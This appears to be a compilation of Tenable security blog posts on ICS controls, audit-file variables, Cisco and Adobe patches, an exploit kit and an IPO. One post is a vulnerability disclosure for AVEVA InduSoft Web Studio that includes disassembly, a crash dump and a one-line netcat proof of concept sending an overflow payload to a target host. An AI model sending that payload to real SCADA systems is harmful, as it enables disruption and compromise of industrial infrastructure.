
CIS Adapts Critical Security Controls to Industrial Control Systems


The Center for Internet Security (CIS) recently updated their popular CIS Controls (formerly known as the SANS Top 20) and just published a companion CIS Controls Implementation Guide for Industrial Control Systems. Cody Dumont and I contributed to this Industrial Control System (ICS) guide, in the hope of making it easier for organizations to employ the CIS Controls to protect OT environments.

Moving toward a common set of IT/OT controls

As more organizations address the challenge of IT/OT convergence, a common set of IT/OT controls is especially valuable.

Most security frameworks focus on either IT or OT. For example, ISO/IEC 27000 focuses on information security management, and ISA99 focuses on manufacturing and control system security. The difference in focus is understandable because IT and OT environments have important differences such as real-time requirements, network protocols and the ability to tolerate active network scanning. These differences have made OT security professionals reluctant to use IT-born security frameworks and solutions in their OT environments.

The U.S. National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity spans IT and OT to promote the protection and resilience of critical infrastructure. Virtually all industry sectors are adopting the NIST Cybersecurity Framework (CSF), first published in 2014. However, CSF Functions (Categories and Subcategories) neither suggest an implementation order nor do they provide detailed control recommendations. Therefore, many organizations adopting the CSF are also adopting the CIS Controls to help them prioritize control implementation and define more granular security controls.

CSF and CIS Control adopters that applied the controls in both IT and OT were required to adapt the CIS Controls before implementing them in OT to ensure sensitive OT networks and devices were not degraded or disrupted. The CIS recognized the need to help organizations adapt the CIS Controls to OT – and, voilà, the CIS Controls Implementation Guide for Industrial Control Systems was born!

CIS Controls Implementation Guide for Industrial Control Systems: How it can help

“ICS Environments may also have many embedded, IP connected devices. These devices often lack the capability to support traditional Information Technology (IT)-grade security control technologies since many run specialized firmware and Real-time Operating Systems (RTOS), have proprietary protocols such as Profibus, COTP, TPKT Modbus and EtherNet/IP, or do not have the ability to support contemporary endpoint or supplicant software that is commonly used in IT systems.”
CIS Controls Implementation Guide for Industrial Control Systems.

The CIS Controls Implementation Guide for Industrial Control Systems is a companion document to use with the 20 prioritized CIS Controls. Each control includes an introduction, applicability description and additional considerations.

Here are excerpts from the first (and most important) control, Inventory of Authorized and Unauthorized Devices, that will give you a flavor of the guidance provided for each control:

Excerpts from CIS Controls Implementation Guide for Industrial Control Systems

  • Introduction:“Understanding and solving the asset inventory and device visibility problem is critical in managing a business’s security program. This is especially challenging in ICS where network segmentation, dual-homing, and isolation are common themes. Mixtures of old and new devices from multiple vendors, lack of up-to-date diagrams, unique industry and application-specific protocols, some of which are not IP-based, and the difficulty in conducting physical inventories in dispersed or hostile environments compound these challenges.”
  • Applicability:“The conventional approach of using ping responses, TCP SYN or ACK scans can also be problematic in ICS due to device sensitivity since even seemingly benign scanning employed in IT environments can disrupt communications, or in some cases even impact device operations. Methods that are more passive to locate connected assets are preferred, as they are less likely to impact system availability or interact with vendor systems in a manner that could cause warranty issues.”
  • Considerations: “Ensure that all equipment acquisitions and system modifications follow an approval process and the technical drawings (if applicable, automated inventory systems) are updated at the time of the change.”

Resources: Securing converged IT/OT systems

Need a prioritized, common control framework to secure converged IT/OT systems or a common language to facilitate communication? Join me on July 18 for the “Six Common Controls Unite and Strengthen OT/IT Security” webinar.

Also, in case you missed our announcement last year, we’ve partnered with Siemens and released Industrial Security, an on-premises security solution purpose-built for OT. It addresses the guide’s recommendation to passively and safely monitor OT networks to deliver asset discovery. Industrial Security also passively assesses vulnerabilities. For a demo or evaluation of Industrial Security, contact your authorized Tenable representative.


Compliance: What You Need to Know About Configuration Audit Variables


Whether assessing systems against your organization’s own security policy or industry benchmarks and standards, configuration auditing is critical to compliance. Security policies are defined via .audit files. This blog post will help you get the most accurate and complete information when using .audit files.

Trying to determine if your organization’s systems are configured in accordance with your organization’s security and compliance policy – or if they adhere to third-party standards, such as CIS or DISA?

Tenable® products have a feature built in for configuration auditing, using a wide range of predefined policies for auditing against benchmarks and guides from organizations like CIS and DISA. In addition to the predefined policies, you can download, modify and scan using customized audits.

The security policy is defined using a file format called .audit. To quickly customize an .audit file to match an environment, variables are used during the assessment. When using an .audit file, updating the variables is handled as part of the scan policy.

What are audit variables?

When we develop .audits for configuration auditing, we use variables so that the configuration checks can easily be customized to the customer's assessed environment. One notable example is the IP addresses of services in the environment, such as NTP servers. Because Tenable develops the audit, it cannot know the IP address in use in the environment being assessed. Thus, the audit writer uses a variable so the customer can easily replace that value in the audit.

For example, the audit writer would define a variable named NTP_SERVER with the description Network Time Server and a default value of 10.0.0.2. When the audit is selected in a scan policy, the policy prompts for a Network Time Server value, pre-filled with the default of 10.0.0.2.

Variable entry

If the network time server in the assessed environment is 192.168.0.2, the customer can enter the real value in the policy. When the scan runs, every instance of @NTP_SERVER@ is replaced with the value entered for Network Time Server, and the check is evaluated with the new address.

An example line found in an .audit file could be:

regex : "^[\\s]*server[\\s]+@NTP_SERVER@"

The line would be changed to look like this:

regex : "^[\\s]*server[\\s]+192.168.0.2"

And the output in the compliance result could look like this:

Sample output

How Tenable uses variables

The variables are located in a special section of the audit file that is used to enhance the user experience of Tenable products. If you look at the variable definitions, they appear to be a commented section that could simply be uncommented and used.

Variable example

This section is commented out from the rest of the audit and is only used when the audit is published through a Tenable product. If the audit is used as a custom audit and uploaded into the policy, this section is currently ignored. Uncommenting the variable definitions would cause an error when the audit is evaluated, if not already on upload.

Additionally, audits published on Tenable Audit Downloads are processed so that the variables are replaced with their default values. This allows the audits to be downloaded and used immediately. If the variable values were not replaced in an .audit file, the worst case is that the .audit is broken and will not scan; the best case is that it produces unreliable results.

When downloading an audit for use as a custom .audit, the process that replaces the variables with default values also adds comments identifying where each variable was used and with what value it was replaced. This helps when manually going through the audit to update all the values with environment-specific ones.

How to work with variables

The best way to work with variables in audits is to use the UI to update the values before scanning. This gives the highest quality results with published audits. But it ignores the power and flexibility of downloaded and custom audits, which can be adjusted to the policies and configurations of the assessed environment.

By using a downloaded audit or creating a custom audit, you can update an audit for special situations, such as:

  • Commenting out checks that don’t make sense for the environment
  • Forcing unique values for checks due to special cases in the environment
  • Forcing a result of a check due to accepted risks in the environment
  • Creating new checks for configurations important to the environment

The only way to adjust values in the current custom audit files is to open the file in a text editor, search for comments on where a variable is replaced and change the value in the line below the comment.

Pro tip

For best results, use Atom, Sublime or VS Code as the editor. Atom and Sublime have packages that can be added to enable syntax highlighting for NASL and .audit files.

Another way to make the variable replacement easier is a script published on GitHub at Replace Variables. Although this Python script doesn’t eliminate the need for a text editor, it limits the edits that need to be made to the variable definitions only. The steps to update the variable values with this script are:

  1. Update the audit file variable definition with the value required in your environment.
  2. Run the script against the audit file to create an updated audit.
  3. Import the audit into your scanning policy and scan.

You can find an example execution of the script on the GitHub page.
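The following is an added illustration of the replacement step described above, written for this post rather than taken from Tenable's Replace Variables script. It parses the commented variable block, substitutes the defaults (or environment-specific overrides), writes a comment above every changed line, and reports placeholders that were left without a value. The .audit fragment is constructed, and the tag names inside the commented block are an assumption about its layout.

```python
import re

# Constructed .audit fragment for this example (not a real Tenable audit).
# The commented <variable> block mirrors the layout the post describes; the exact
# tag names inside it are an assumption.
SAMPLE_AUDIT = r'''#<variable>
#  <name>NTP_SERVER</name>
#  <default>10.0.0.2</default>
#  <description>Network Time Server</description>
#</variable>
<check_type:"Unix">
<custom_item>
  type        : FILE_CONTENT_CHECK
  description : "ntp.conf points at the approved time server"
  file        : "/etc/ntp.conf"
  regex       : "^[\\s]*server[\\s]+@NTP_SERVER@"
  expect      : "^[\\s]*server[\\s]+@NTP_SERVER@"
</custom_item>
</check_type>
'''

VAR_BLOCK = re.compile(r"^#<variable>\n(.*?)^#</variable>", re.M | re.S)
VAR_FIELD = re.compile(r"^#\s*<(name|default|description)>(.*?)</\1>", re.M)
PLACEHOLDER = re.compile(r"@([A-Z0-9_]+)@")


def parse_variables(audit_text):
    """Return {name: (default, description)} from the commented variable blocks."""
    variables = {}
    for block in VAR_BLOCK.findall(audit_text):
        fields = {tag: value.strip() for tag, value in VAR_FIELD.findall(block)}
        if "name" in fields:
            variables[fields["name"]] = (fields.get("default", ""),
                                         fields.get("description", ""))
    return variables


def replace_variables(audit_text, overrides=None):
    """Substitute @NAME@ placeholders on every non-comment line.

    Values come from `overrides` (environment-specific) or else from the block's
    default. A comment naming the variable and its value is written above each
    changed line so the edit can be found again later. Returns the new text and
    the list of placeholder names that had no value; a placeholder left behind
    breaks the scan, so callers should treat that list as an error.
    Values are substituted literally, as the product does, so a value used in a
    regex field must already be regex-safe.
    """
    values = {name: default for name, (default, _) in parse_variables(audit_text).items()}
    values.update(overrides or {})
    out, unresolved = [], []
    for line in audit_text.splitlines():
        if line.lstrip().startswith("#"):      # leave comments, incl. the variable block
            out.append(line)
            continue
        names = list(dict.fromkeys(PLACEHOLDER.findall(line)))   # unique, in order
        indent = line[: len(line) - len(line.lstrip())]
        for name in names:
            if name in values:
                out.append(f"{indent}# @{name}@ replaced with {values[name]}")
                line = line.replace(f"@{name}@", values[name])
            else:
                unresolved.append(name)
        out.append(line)
    return "\n".join(out) + "\n", unresolved


if __name__ == "__main__":
    text, missing = replace_variables(SAMPLE_AUDIT, {"NTP_SERVER": "192.168.0.2"})
    print(text)
    if missing:
        raise SystemExit(f"unresolved variables: {missing}")
```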

Where do we go from here?

So, how do we improve the use of variables? With Tenable.io, we can quickly make and share improvements, such as:

  • Audit variables processed on import
  • An audit writer workbench to assist in building and using audits
  • An audit check library that works with the workbench to copy and modify existing checks

And like Bill Kurtis from Wait Wait...Don't Tell Me! would say... Well, if any of that happens, we're going to tell you about it here on the blog.

Tenable Research Advisory: Patches Issued For Critical Vulnerabilities in 2 AVEVA SCADA/OT Apps


A new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition can be exploited to compromise sensitive operational technology. AVEVA has released a patch and we advise urgent attention and response from affected end users.

Tenable Research discovered a new critical remote code execution (RCE) vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition. The applications contain a stack buffer overflow that can be exploited to execute arbitrary code on target systems.

These products were previously marketed under the Schneider Electric brand and are now being managed by AVEVA.

What do you need to know? Tenable Research discovered a new critical remote code execution vulnerability in AVEVA’s Indusoft Web Studio and InTouch Machine Edition.

What's the attack vector? The vulnerability can be remotely exploited without authentication to execute arbitrary commands on the target system.

What's the business impact? A malicious threat actor can completely compromise and gain control of the system, then use it as a pivot point for lateral movement.

What's the solution? AVEVA has released InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to address this vulnerability. Affected users should urgently apply the patches.

Background

InduSoft Web Studio is a suite of tools providing automation building blocks which are used to develop human-machine interfaces (HMIs), Supervisory Control and Data Acquisition (SCADA) systems and embedded instrumentation solutions.

InTouch Machine Edition is an HMI/SCADA software toolset used to develop applications that connect automation systems and interfaces for web browsers, smartphones and tablets.

Diverse industries -- including agriculture, transportation, energy, nuclear power, manufacturing, entertainment and physical security -- use SCADA in conjunction with operational technology (OT). Because of their critical role in modern infrastructure and the wide range of industries that deploy them, SCADA systems have become a primary security concern and are increasingly being targeted by threat actors.

Analysis

Tenable Research found a new stack overflow vulnerability in TCPServer.dll. The vulnerability is in the code that reads a 'string' from the received network data. It is similar to the one we disclosed in May 2018, but is triggered through command 81 instead of command 50.

Here’s a description of two data structures in TCPServer.dll to help you understand the vulnerability.

  1. The following object (referred to here as 'WSTR') is used to store a wide-character string:

     class WSTR
     {
         vftable;
         unsigned short lbuf[0x40]; // local storage for the string data
         void *pData;               // ptr to string data; can point to @lbuf
         int32 DataLen;             // length allocated for @pData
         ...
     };

     When the string fits in lbuf, it is stored there. Otherwise, heap memory is allocated to store the string.

  2. Another object heavily used in TCPServer.dll is the 'TcpServerThreadBuffer' (referred to here as CBuf). This object is used to store, process and manipulate network data received from clients.

     class CBuf
     {
         vftable;
         int32 AllocSize;  // used for allocation, seen: 0x4000
         int32 CurPos;     // current position
         int32 BufSize;    // allocated size of @pBuffer
         void *pBuffer;    // buffer holding network data; can point to @lbuf
         byte lbuf[0x100]; // local storage for network data
         ...
     };


Inside the virtual function table, there are many functions used to read and write various types of command parameters (i.e., byte, boolean, short, int32 and string).

The vulnerability can be triggered via command 81:

    [...]
    .text:5D43D8B8      xor     eax, eax
    .text:5D43D8BA      mov     [ebp+var_wstr.vftable], offset off_5D4CAD5C
    .text:5D43D8C4      mov     word ptr [ebp+var_wstr.lbuf], ax ; wstr.lbuf[0] = '\0';
    .text:5D43D8CB      mov     [ebp+var_wstr.pData], eax ; wstr.pData = NULL;
    .text:5D43D8D1      mov     [ebp+var_wstr.DataLen], eax ; wstr.DataLen = 0;
    .text:5D43D8D7      lea     ecx, [ebp+var_wstr]; a wstr object on the stack
    .text:5D43D8DD      mov     [ebp+var_4], eax
    .text:5D43D8E0      mov     eax, [edi]
    .text:5D43D8E2      push    ecx
    .text:5D43D8E3      mov     ecx, edi
    .text:5D43D8E5      call    [eax+vftCBuf.Cbuf_ReadString] ; Cbuf_ReadString
    [...]

Here, the code tries to read a 'string' object from the network data into a WSTR object (which is on the stack). This means wstr.lbuf is a buffer on the stack.

Inside Cbuf_ReadString(), the length of the 'string' object is read, and the function tries to allocate str_len + 1 to store the string:

    [...]
    .text:5D40C05D      call    Cbuf_ReadStringLength ; return  1, 2, or 4 byte(s)
    .text:5D40C062      mov     esi, [ebp+arg_sbuf]
    .text:5D40C065      mov     edi, eax ; attacker specifies length 0xffffffff
    .text:5D40C067      mov     ecx, esi
    .text:5D40C069      lea     edx, [edi+1] ; length wraps to 0 if 0xffffffff
    .text:5D40C06C      push    edx
    .text:5D40C06D      call    wstr_alloc
    [...]

If the attacker specifies 0xFFFFFFFF as the string length, an alloc size of 0 is passed to wstr_alloc(), which increments the size by one and checks whether the result fits in the local buffer (wstr.lbuf). Since 1 (0 + 1) is less than 0x40 (countof(wstr.lbuf)), the function returns 1 without allocating heap memory, assuming wstr.lbuf is big enough to store the string:

    [...]
    .text:5D40BDD4      mov     edx, [ebp+arg_size]
    .text:5D40BDD7      inc     edx ; size++
    .text:5D40BDD8      push    edi
    .text:5D40BDD9      mov     edi, ecx
    .text:5D40BDDB      mov     [ebp+arg_size], edx
    .text:5D40BDDE      cmp     edx, 40h
    .text:5D40BDE1      jge     short loc_5D40BDEF
    .text:5D40BDE3      mov     eax, 1
    [...]

Then Cbuf_ReadString() calls a CBuf method to read in the string data, telling it the stack buffer has 0xffffffff bytes:

    [...]
    .text:5D40C09C      push    edi ; 0xffffffff
    .text:5D40C09D      push    ecx ; stack buf
    .text:5D40C09E      mov     ecx, ebx
    .text:5D40C0A0      call    [eax+vftCBuf.ReadAndConvertToWchars] ; stack overflow!
    [...]

which can cause a stack buffer overflow:

    STATUS_STACK_BUFFER_OVERRUN encountered
    (9e8.b28): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870
    eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    766ce331 cc              int     3
    0:020> kb
     # ChildEBP RetAddr  Args to Child
    00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\InduSoft Web Studio v8.1\Bin\TCPSERVER.DLL -
    01 0e76f288 5d133403 5d15b708 00000001 0e76f5c8 MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    02 0e76f298 5d13351a 5d15b708 00000010 00000044 TCPSERVER!_StudioSetLanguage__+0x1653
    03 0e76f5c8 5d0bdbff 049ecae8 049ecb18 049ecb18 TCPSERVER!_StudioSetLanguage__+0x176a
    04 0e76f7ec 00410041 00410041 00410041 00410041 TCPSERVER+0x3dbff
    05 0e76f7f0 00410041 00410041 00410041 00410041 0x410041
    06 0e76f7f4 00410041 00410041 00410041 00410041 0x410041
    07 0e76f7f8 00410041 00410041 00410041 00410041 0x410041
    [...]
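To make the length arithmetic concrete, here is an added model of the decision path the disassembly shows, written for this post rather than taken from TCPServer.dll. It reproduces the 32-bit wrap with an explicit mask (Python integers do not wrap on their own) and places a hardened variant beside it; the hardened checks are a suggestion for how such a reader should bound its lengths, not AVEVA's actual patch, and the test lengths are constructed.

```python
# Model of the length handling described above; this is not AVEVA's code.
# 32-bit wrap-around is reproduced explicitly with a mask.
U32_MASK = 0xFFFFFFFF
LBUF_COUNT = 0x40            # countof(wstr.lbuf): wide chars available on the stack


def plan_read_as_described(str_len: int) -> dict:
    """Reproduce the decision path the disassembly shows for a given wire length.

    Cbuf_ReadString computes str_len + 1 in a 32-bit register (lea edx, [edi+1]),
    wstr_alloc increments once more (inc edx) and compares against 0x40, and the
    subsequent read is told the destination holds str_len elements.
    """
    alloc_arg = (str_len + 1) & U32_MASK      # wraps to 0 when str_len == 0xffffffff
    size = (alloc_arg + 1) & U32_MASK         # size++ inside wstr_alloc
    if size < LBUF_COUNT:                     # cmp edx, 40h / jge -> use the stack buffer
        dest, capacity = "lbuf", LBUF_COUNT
    else:
        dest, capacity = "heap", size
    return {"dest": dest, "capacity": capacity, "read_limit": str_len}


def overflows(plan: dict) -> bool:
    """True when the limit handed to ReadAndConvertToWchars exceeds the destination."""
    return plan["read_limit"] > plan["capacity"]


def plan_read_hardened(str_len: int, bytes_available: int) -> dict:
    """Hardened variant (an added suggestion, not the vendor's fix).

    Reject lengths that cannot be incremented without wrapping, reject lengths
    larger than the data actually received, and size the destination from the
    checked value so the read limit can never exceed the allocated capacity.
    """
    if str_len > U32_MASK - 1:
        raise ValueError("string length would wrap when incremented")
    if str_len > bytes_available:
        raise ValueError("string length exceeds received data")
    needed = str_len + 1                      # room for the terminating NUL
    if needed <= LBUF_COUNT:
        dest, capacity = "lbuf", LBUF_COUNT
    else:
        dest, capacity = "heap", needed
    # read_limit is at most capacity - 1 by construction, so overflows() is always False
    return {"dest": dest, "capacity": capacity, "read_limit": str_len}


if __name__ == "__main__":
    for length in (5, 0x3E, 0x100, 0xFFFFFFFF):      # constructed wire lengths
        plan = plan_read_as_described(length)
        print(f"len=0x{length:x}: dest={plan['dest']} capacity=0x{plan['capacity']:x} "
              f"overflow={overflows(plan)}")
```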

Proof of Concept (PoC)

Below is the PoC to trigger the stack buffer overflow:

    cat < (echo -ne '\x02\x31\x10\x31\x10\x38\x10\x32\x10\x32\x03\x02\x51\xff\xff\xff\xff\xff\xff\xff'`python -c "print 'A'*1000"`'\x03') - | nc <target_host> 1234

Business impact

These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks.

AVEVA and Tenable consider this a critical vulnerability requiring urgent attention and response from affected end users.

Solution

AVEVA has released updates InduSoft Web Studio Hotfix 81.1.00.08 and InTouch Machine Edition Hotfix 81.1.00.08 to remediate this vulnerability. Update the application by applying the appropriate patches:

Additional information

Cisco Issues Patches for 4 Critical Vulnerabilities in Cisco Policy Suite


Cisco’s Policy Suite for Mobile controls billing and access control for customer devices. Root access to this suite is concerning because of the breadth of user device access.

The latest batch of Cisco patches includes fixes for four critical vulnerabilities related to unauthenticated access and default credentials in the Cisco Policy Suite for the Cisco Mobility Services Engine. All four were discovered by internal security testing. In addition, nine high-severity vulnerabilities and 12 medium ones were patched in a variety of other Cisco platforms.

Analysis

Two of the vulnerabilities (CVE-2018-0376 and CVE-2018-0374) give unauthenticated access to the Policy Builder database and interface, respectively, allowing for unauthorized changes to take place. CVE-2018-0377 affects the Open Systems Gateway initiative (OSGi) interface of the Policy Builder Suite and allows the remote attacker to access or change any files that are accessible by the OSGi process. The last critical patch (CVE-2018-0375) involves default credentials in the Cluster Manager of the Suite giving the attacker remote root access.

These Cisco vulnerabilities received a CVSS v3.0 score of 9.8 out of 10, indicating a "critical" degree of severity.

Cisco’s Policy Suite for Mobile controls billing and access control for customer devices. According to Cisco’s configuration documentation, the policy suite controls mobile user configuration and active session tracking. Root access to this suite is concerning because of the breadth of user device access.

Below is a visualization of the scope of mobile elements that this software interacts with.

[Figure: scope of the mobile elements the Cisco Policy Suite interacts with] (Source: Cisco)

Solution

The OSGi interface unauthenticated access vulnerability (CVE-2018-0377) affects Cisco Policy Suite releases prior to Release 18.1.0 and is fixed in Cisco Policy Suite Release 18.1.0.

The Cisco Policy Suite Policy Builder Unauthenticated Access Vulnerability (CVE-2018-0376), Cisco Policy Suite Policy Builder Database Unauthenticated Access Vulnerability (CVE-2018-0374) and Cisco Policy Suite Cluster Manager Default Password Vulnerability (CVE-2018-0375) affect releases prior to 18.2.0 and are fixed in Cisco Policy Suite Release 18.2.0. For CVE-2018-0375, a workaround script (change_passwd.sh) is available that can be used to change the existing default password.

Additional Information

Critical Cisco Security Advisories:

Learn more about Tenable.io®, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Tenable IPO: Accelerating Our Vision


Today, Tenable officially became a public company, trading on the Nasdaq under the ticker symbol TENB.

As we embark on our new chapter as a public company, I want to take this moment to thank each of you, our loyal customers. Our company was founded on a mission to help you solve some of the hardest challenges around understanding where you are vulnerable. We built this company in close collaboration with the security community to make sure we are continuously adapting and growing as your needs change.

Rest assured, the foundations that made Tenable the global cybersecurity leader it is today will not change as we chart a larger path forward. In fact, operating as a public company will give us the ability to accelerate on our vision, our product development and our ability to help you understand and reduce Cyber Exposure in this age of digital transformation.

We are committed to our vision of helping you gain visibility across the entirety of the modern attack surface – whether it’s IT assets, cloud environments, IoT devices or Operational Technology systems. We are also excited to bring Tenable.io Lumin to market, which will provide deep analytics to help security and business executives translate vulnerability data into business insights through prioritization, benchmarking and measurement of Cyber Exposure. We are going to transform how security is managed and measured – together!

To all of our customers, thank you for putting your trust in Tenable. We remain laser focused to make sure we’re delivering on our mission, and that we continue to deliver the world-class products, services and support that you have come to expect from us.

And, while none of us can predict the future, I’m sure of one thing – I couldn’t be more proud or more excited to work alongside such an awesome team and to partner with such amazing customers.

Thank you for your loyalty and support.

Amit

Cybersecurity Benchmarking: Where’s The Data?


When it comes to communicating with the C-suite and Board of Directors about their organization’s cyber exposure, few IT and security professionals are happy with the benchmarking data currently available.

The ability to proactively measure and demonstrate how cyber exposure risk changes over time is crucial to communicating the value of cybersecurity investments to the C-suite and Board of Directors. Equally important is the ability to show how an organization’s cyber exposure management efforts compare to that of its peers. Yet, the vast majority of IT and cybersecurity professionals surveyed by Tenable said they’re not happy with the benchmarking data they use to demonstrate the effectiveness of their security program to business leaders.

These are the findings of a poll we conducted during last month’s Infosecurity Europe conference in London. Nearly three quarters (73%) of the 280 IT and security professionals we polled at the event confirmed the importance of using metrics to benchmark their cyber exposure.

The majority of respondents (80%) said they see value in sharing benchmarking data to demonstrate the effectiveness of their security program to the Board of Directors or C-suite. Yet, only 59% of respondents said they currently leverage benchmarking data.

Even more alarming, a fifth of respondents (21%) said they do not currently use any benchmark data when communicating with the Board of Directors or C-suite -- though they would like to do so. Only 18% said they see no value in sharing such data with C-level leadership.

Why Cyber Exposure Benchmarking Matters

In order to understand where an organization is exposed, and determine which cybersecurity efforts are most effective, you need visibility into vulnerabilities and threats. But such visibility is only the beginning. You also need the ability to analyze the data and track the organization’s ability to react appropriately when issues are discovered.

Data showing how your cyber exposure posture has improved over time -- and how it stacks up against that of your industry peers -- allows you to demonstrate the value of your cybersecurity investments and support your requests for additional resources. The ability to share these cyber exposure benchmarks with your C-suite and board helps you improve their understanding of the organization’s risk posture.

The majority of survey respondents (54%) said they are already comparing their organization’s metrics against those of their industry peers. Yet, more than a third of these respondents (35%) say they would like comparative peer data; only 19% said they are happy with the benchmark data available. More than a quarter of respondents (26%) said they don’t currently benchmark against their peers and would like to do so.

What does effective cyber exposure benchmarking look like?

Through our work with cybersecurity professionals, we’ve identified four key questions every organization needs to be able to answer to communicate cyber risk to the business:

  • Where are we exposed?
  • Where should we prioritize efforts based on risk?
  • How are we reducing our exposure over time?
  • How does our cyber hygiene compare to our peers?

We recognize how challenging it is in today’s enterprise environment for you to answer these key questions. You’re faced with a mountain of data, much of it static and drawn from multiple spreadsheets, and you’re expected to turn it into the kinds of insights business leaders can use. Effective cyber exposure benchmarking requires live and holistic visibility across every asset in your organization -- not only your IT assets and cloud infrastructure, but your organization’s internet of things (IoT) tools and industrial control systems.

Cyber exposure benchmarking provides an objective way for you to measure and communicate cyber risk to business leaders, who can then use it to make strategic decisions. Knowing which areas of your business are secure - or exposed - and measuring your organization against a larger set of peer data opens up a whole new set of discussions and decisions about where your organization needs to focus.

Learn more about cyber exposure

July Vulnerability of the Month: Two Zero-Days Caught in Development


An Adobe Reader double free vulnerability on Windows and macOS systems earns the nod for its interesting discovery and patch story.

Novelty, sophistication or just plain weirdness are some of the potential criteria we use to select the Tenable vulnerability of the month. We collect nominations from our 70+ research team members, shortlist the finalists and give the entire team the chance to vote -- combining the total experience and knowledge of Tenable Research to identify the vulnerability of the month.

Background

This month, Tenable Research highlights CVE-2018-4990, an Adobe Reader double free vulnerability on Windows and macOS systems. CVE-2018-4990 has an interesting discovery and patch story. It was discovered by ESET researchers in March 2018 because the developers uploaded their malicious PDF to their public repository. Because the sample didn’t contain the final payload, researchers concluded it was still in development. The researchers disclosed this vulnerability -- along with CVE-2018-8120, a privilege escalation bug in Microsoft Windows -- to the vendors. Security patches were issued in mid-May.

What makes this the vulnerability of the month?

It’s always interesting when the (potential) attackers tip their hands. Uploading malicious samples to a public repository while they’re still in development wasn’t the smartest move, assuming stealth was desired. Uploading the incomplete sample might have been a tactic to determine if any antivirus software would detect it. The samples “demonstrated a high level of skills in vulnerability discovery and exploit writing," according to ESET.

This is also an excellent example of how vulnerabilities can be chained to achieve remote code execution with highest privileges. Had the vulnerabilities not been discovered and patched before the exploits were fully developed, it’s likely they would have been widely used by attackers, particularly in exploit kits, with potentially disastrous consequences.

Vulnerability details

This vulnerability impacts Adobe Reader/DC 2018.011.20038 and earlier versions along with Adobe Acrobat Reader 2017/DC 2017.011.30079 and earlier versions.

An attacker who successfully exploits the vulnerability could achieve arbitrary code execution in the context of the current user. While the malicious PDF is available on VirusTotal, we are not aware of any reports of these vulnerabilities being exploited in the wild yet.

When the two vulnerabilities (CVE-2018-4990 and CVE-2018-8120) are combined, as they were in the upload to VirusTotal, an attacker could gain complete control of an affected system. We’ve released the following Nessus® plugins to assist our customers in finding and securing their exposure to CVE-2018-4990 as well as the other vulnerabilities patched in the update.

Plugin ID | Description
109895 | Adobe Acrobat
109896 | Adobe Reader
109897 | Adobe Acrobat
109898 | Adobe Reader
109604 | KB4103712: Windows 7 and Windows Server 2008 R2 May 2018 Security Update
109651 | Security Updates for Windows Server 2008 (May 2018)

Additional resources

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Underminer Exploit Kit: How Tenable Can Help

The “Underminer” exploit kit is having widespread impact in Asian countries, particularly Japan. Thankfully, mitigation is relatively simple and involves patching and other well-known security best practices.

Contrary to popular belief, the exploit kit is not dead yet. “Underminer,” an exploit kit named and discovered by Trend Micro, is having widespread impact in Asian countries, particularly Japan. Its nefarious bootkit affects the system’s boot sectors and delivers the coin mining payload named Hidden Mellifera.

While the continued decline of Adobe Flash has led to a reduction in the prevalence of exploit kits, enterprises need to remember this attack vector remains a real problem. Underminer is quite sophisticated and has many of the capabilities used by other problematic exploit kits, including user-agent/browser profiling to determine the Flash Player version and cookie detection to prevent repeated visits to the exploit site. In addition, traffic is RSA-encrypted prior to exploitation.

The following diagram from Trend Micro provides a useful high-level view of the stages and vectors of Underminer:

Source: Trend Micro, https://blog.trendmicro.com/trendlabs-security-intelligence/files/2018/07/underminer-exploit-kit-4.png.

As of 4:45 am EDT on July 27, the antivirus (AV) programs tested by VirusTotal have very limited coverage of the provided SHA-256 checksums (3/40). However, that’s bound to change with time and is likely due to the localized exploitation. Thankfully, mitigation is relatively simple and involves patching and other well-known security best practices, such as preventing unnecessary browser plugins, good firewall hygiene, antivirus updates, user awareness and so on.

Antivirus programs tested by VirusTotal (screenshot of the detection results)

Source: VirusTotal, https://www.virustotal.com/#/file/a795deaa2d1c1f2d9426a8c28791111e0192ffad14d086b51bc61c8e16008b63/detection.

Tenable’s Coverage for Underminer Exploit Kit

CVE | Plugin ID | Description
CVE-2015-5119 | 84641 | Adobe AIR
CVE-2015-5119 | 84642 | Adobe Flash Player
CVE-2015-5119 | 84667 | Google Chrome
CVE-2015-5119 | 84645 | MS KB3065823: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer
CVE-2016-0189 | 91001 | MS16-051: Cumulative Security Update for Internet Explorer (3155533)
CVE-2016-0189 | 91003 | MS16-053: Cumulative Security Update for JScript and VBScript (3156764)
CVE-2018-4878 | 106606 | Adobe Flash Player
CVE-2018-4878 | 106655 | KB4074595: Security update for Adobe Flash Player (February 2018)


How Mature Are Your Cyber Defender Strategies?

Our latest research examines real-world vulnerability assessment practices at 2,100 organizations to understand how defenders are approaching this crucial step in cyber hygiene.

For our latest research study, "Cyber Defender Strategies: What Your Vulnerability Assessment Practices Reveal," we explore how organizations are practicing vulnerability assessment (VA), and what these practices teach us about cyber maturity.

Our curiosity was piqued by our previous study, “Quantifying the Attacker's First-Mover Advantage,” which found it takes attackers a median of five days to gain access to a functioning exploit. In contrast, we learned, defenders take a median 12 days to assess for a vulnerability. The difference between the two results is a median seven-day window of opportunity for an attacker to strike, during which a defender isn’t even aware they’re vulnerable. This led us to consider how defenders are performing in the all-important discovery and assess phases of the Cyber Exposure Lifecycle.

